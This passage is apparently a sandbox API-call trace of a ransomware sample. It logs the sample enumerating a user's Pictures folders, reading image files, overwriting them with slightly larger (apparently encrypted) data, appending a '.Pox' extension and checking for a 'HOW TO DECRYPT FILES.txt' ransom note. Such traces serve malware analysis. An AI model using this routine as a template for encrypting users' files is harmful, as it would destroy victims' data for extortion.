MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\dujtep9pnzdt5f-p8c.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\dujtep9pnzdt5f-p8c.bmp.pox")) returned 1 [0040.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2", lpFilePart=0x0) returned 0x55 [0040.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\", lpFilePart=0x0) returned 0x56 [0040.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76092b0, ftCreationTime.dwHighDateTime=0x1d4c5b9, ftLastAccessTime.dwLowDateTime=0x9de4df60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x9de4df60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.694] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76092b0, ftCreationTime.dwHighDateTime=0x1d4c5b9, ftLastAccessTime.dwLowDateTime=0x9de4df60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x9de4df60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.694] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6d6bf0, ftCreationTime.dwHighDateTime=0x1d4d04a, ftLastAccessTime.dwLowDateTime=0xedfc3ab0, ftLastAccessTime.dwHighDateTime=0x1d4caa2, ftLastWriteTime.dwLowDateTime=0xedfc3ab0, ftLastWriteTime.dwHighDateTime=0x1d4caa2, nFileSizeHigh=0x0, nFileSizeLow=0x10ee4, dwReserved0=0x0, dwReserved1=0x0, cFileName="d wVAdnovG 9n.gif", cAlternateFileName="DWVADN~1.GIF")) returned 1 [0040.694] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf5cc8d0, ftCreationTime.dwHighDateTime=0x1d4c7cd, ftLastAccessTime.dwLowDateTime=0x8db82620, ftLastAccessTime.dwHighDateTime=0x1d4d266, ftLastWriteTime.dwLowDateTime=0x8db82620, ftLastWriteTime.dwHighDateTime=0x1d4d266, nFileSizeHigh=0x0, nFileSizeLow=0x24a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jL7pCJOH.gif", cAlternateFileName="")) returned 1 [0040.694] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa65e6c10, ftCreationTime.dwHighDateTime=0x1d4d438, ftLastAccessTime.dwLowDateTime=0x3acafe50, ftLastAccessTime.dwHighDateTime=0x1d4c68c, ftLastWriteTime.dwLowDateTime=0x3acafe50, ftLastWriteTime.dwHighDateTime=0x1d4c68c, nFileSizeHigh=0x0, nFileSizeLow=0x12654, dwReserved0=0x0, dwReserved1=0x0, cFileName="oid828hxpGyx.bmp", cAlternateFileName="OID828~1.BMP")) returned 1 [0040.694] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde7642d0, ftCreationTime.dwHighDateTime=0x1d4ce43, ftLastAccessTime.dwLowDateTime=0x4b77490, ftLastAccessTime.dwHighDateTime=0x1d4d5ac, ftLastWriteTime.dwLowDateTime=0x4b77490, ftLastWriteTime.dwHighDateTime=0x1d4d5ac, nFileSizeHigh=0x0, nFileSizeLow=0x550f, dwReserved0=0x0, dwReserved1=0x0, cFileName="sg-E3ucFPLsX3qelYBy.jpg", cAlternateFileName="SG-E3U~1.JPG")) returned 1 [0040.694] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2064a230, ftCreationTime.dwHighDateTime=0x1d4d56b, ftLastAccessTime.dwLowDateTime=0xdbc64410, ftLastAccessTime.dwHighDateTime=0x1d4c85b, ftLastWriteTime.dwLowDateTime=0xdbc64410, ftLastWriteTime.dwHighDateTime=0x1d4c85b, nFileSizeHigh=0x0, nFileSizeLow=0xe310, dwReserved0=0x0, dwReserved1=0x0, cFileName="TEavp.bmp", cAlternateFileName="")) returned 1 [0040.695] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7aa2870, ftCreationTime.dwHighDateTime=0x1d4d10f, ftLastAccessTime.dwLowDateTime=0xa3643690, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0xa3643690, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0x15127, dwReserved0=0x0, dwReserved1=0x0, cFileName="y5ZkF.bmp", cAlternateFileName="")) returned 1 [0040.695] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.695] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2", lpFilePart=0x0) returned 0x55 [0040.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\", lpFilePart=0x0) returned 0x56 [0040.695] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76092b0, ftCreationTime.dwHighDateTime=0x1d4c5b9, ftLastAccessTime.dwLowDateTime=0x9de4df60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x9de4df60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.695] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76092b0, ftCreationTime.dwHighDateTime=0x1d4c5b9, ftLastAccessTime.dwLowDateTime=0x9de4df60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x9de4df60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.695] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6d6bf0, ftCreationTime.dwHighDateTime=0x1d4d04a, ftLastAccessTime.dwLowDateTime=0xedfc3ab0, ftLastAccessTime.dwHighDateTime=0x1d4caa2, ftLastWriteTime.dwLowDateTime=0xedfc3ab0, ftLastWriteTime.dwHighDateTime=0x1d4caa2, nFileSizeHigh=0x0, nFileSizeLow=0x10ee4, dwReserved0=0x0, dwReserved1=0x0, cFileName="d wVAdnovG 9n.gif", cAlternateFileName="DWVADN~1.GIF")) returned 1 [0040.696] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf5cc8d0, ftCreationTime.dwHighDateTime=0x1d4c7cd, ftLastAccessTime.dwLowDateTime=0x8db82620, ftLastAccessTime.dwHighDateTime=0x1d4d266, ftLastWriteTime.dwLowDateTime=0x8db82620, ftLastWriteTime.dwHighDateTime=0x1d4d266, nFileSizeHigh=0x0, nFileSizeLow=0x24a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jL7pCJOH.gif", cAlternateFileName="")) returned 1 [0040.696] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa65e6c10, ftCreationTime.dwHighDateTime=0x1d4d438, ftLastAccessTime.dwLowDateTime=0x3acafe50, ftLastAccessTime.dwHighDateTime=0x1d4c68c, ftLastWriteTime.dwLowDateTime=0x3acafe50, ftLastWriteTime.dwHighDateTime=0x1d4c68c, nFileSizeHigh=0x0, nFileSizeLow=0x12654, dwReserved0=0x0, dwReserved1=0x0, cFileName="oid828hxpGyx.bmp", cAlternateFileName="OID828~1.BMP")) returned 1 [0040.696] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde7642d0, ftCreationTime.dwHighDateTime=0x1d4ce43, ftLastAccessTime.dwLowDateTime=0x4b77490, ftLastAccessTime.dwHighDateTime=0x1d4d5ac, ftLastWriteTime.dwLowDateTime=0x4b77490, ftLastWriteTime.dwHighDateTime=0x1d4d5ac, nFileSizeHigh=0x0, nFileSizeLow=0x550f, dwReserved0=0x0, dwReserved1=0x0, cFileName="sg-E3ucFPLsX3qelYBy.jpg", cAlternateFileName="SG-E3U~1.JPG")) returned 1 [0040.696] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2064a230, ftCreationTime.dwHighDateTime=0x1d4d56b, ftLastAccessTime.dwLowDateTime=0xdbc64410, ftLastAccessTime.dwHighDateTime=0x1d4c85b, ftLastWriteTime.dwLowDateTime=0xdbc64410, ftLastWriteTime.dwHighDateTime=0x1d4c85b, nFileSizeHigh=0x0, nFileSizeLow=0xe310, dwReserved0=0x0, dwReserved1=0x0, cFileName="TEavp.bmp", cAlternateFileName="")) returned 1 [0040.696] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7aa2870, ftCreationTime.dwHighDateTime=0x1d4d10f, ftLastAccessTime.dwLowDateTime=0xa3643690, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0xa3643690, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0x15127, dwReserved0=0x0, dwReserved1=0x0, cFileName="y5ZkF.bmp", cAlternateFileName="")) returned 1 [0040.697] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7aa2870, ftCreationTime.dwHighDateTime=0x1d4d10f, ftLastAccessTime.dwLowDateTime=0xa3643690, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0xa3643690, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0x15127, dwReserved0=0x0, dwReserved1=0x0, cFileName="y5ZkF.bmp", cAlternateFileName="")) returned 0 [0040.697] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp", lpFilePart=0x0) returned 0x66 [0040.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0040.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\oid828hxpgyx.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.697] GetFileType (hFile=0x26c) returned 0x1 [0040.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0040.697] GetFileType (hFile=0x26c) returned 0x1 [0040.697] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x12654 [0040.697] ReadFile (in: hFile=0x26c, lpBuffer=0x24f7ab4, nNumberOfBytesToRead=0x12654, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x24f7ab4*, lpNumberOfBytesRead=0x3ae414*=0x12654, lpOverlapped=0x0) returned 1 [0040.698] CloseHandle (hObject=0x26c) returned 1 [0040.714] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0040.714] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0040.714] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp", lpFilePart=0x0) returned 0x66 [0040.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0040.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\oid828hxpgyx.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.715] GetFileType (hFile=0x26c) returned 0x1 [0040.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0040.716] GetFileType (hFile=0x26c) returned 0x1 [0040.716] WriteFile (in: hFile=0x26c, lpBuffer=0x257bbd0*, nNumberOfBytesToWrite=0x12660, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x257bbd0*, lpNumberOfBytesWritten=0x3ae408*=0x12660, lpOverlapped=0x0) returned 1 [0040.718] CloseHandle (hObject=0x26c) returned 1 [0040.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp", lpFilePart=0x0) returned 0x66 [0040.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp.Pox", lpFilePart=0x0) returned 0x6a [0040.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0040.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\oid828hxpgyx.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa65e6c10, ftCreationTime.dwHighDateTime=0x1d4d438, ftLastAccessTime.dwLowDateTime=0x3acafe50, ftLastAccessTime.dwHighDateTime=0x1d4c68c, ftLastWriteTime.dwLowDateTime=0x2a7314a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x12660)) returned 1 [0040.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0040.719] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\oid828hxpgyx.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\oid828hxpGyx.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\oid828hxpgyx.bmp.pox")) returned 1 [0040.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg", lpFilePart=0x0) returned 0x6d [0040.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0040.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\sg-e3ucfplsx3qelyby.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.776] GetFileType (hFile=0x26c) returned 0x1 [0040.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0040.776] GetFileType (hFile=0x26c) returned 0x1 [0040.776] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x550f [0040.776] ReadFile (in: hFile=0x26c, lpBuffer=0x258e97c, nNumberOfBytesToRead=0x550f, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x258e97c*, lpNumberOfBytesRead=0x3ae414*=0x550f, lpOverlapped=0x0) returned 1 [0040.777] CloseHandle (hObject=0x26c) returned 1 [0040.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0040.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0040.830] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg", lpFilePart=0x0) returned 0x6d [0040.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0040.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\s95fndm 7mo2pysi2\\sg-e3ucfplsx3qelyby.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.831] GetFileType (hFile=0x26c) returned 0x1 [0040.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0040.831] GetFileType (hFile=0x26c) returned 0x1 [0040.831] WriteFile (in: hFile=0x26c, lpBuffer=0x23fc2c4*, nNumberOfBytesToWrite=0x5510, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x23fc2c4*, lpNumberOfBytesWritten=0x3ae408*=0x5510, lpOverlapped=0x0) returned 1 [0040.832] CloseHandle (hObject=0x26c) returned 1 [0040.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg", lpFilePart=0x0) returned 0x6d [0040.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\s95FnDm 7mO2PYSi2\\sg-E3ucFPLsX3qelYBy.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 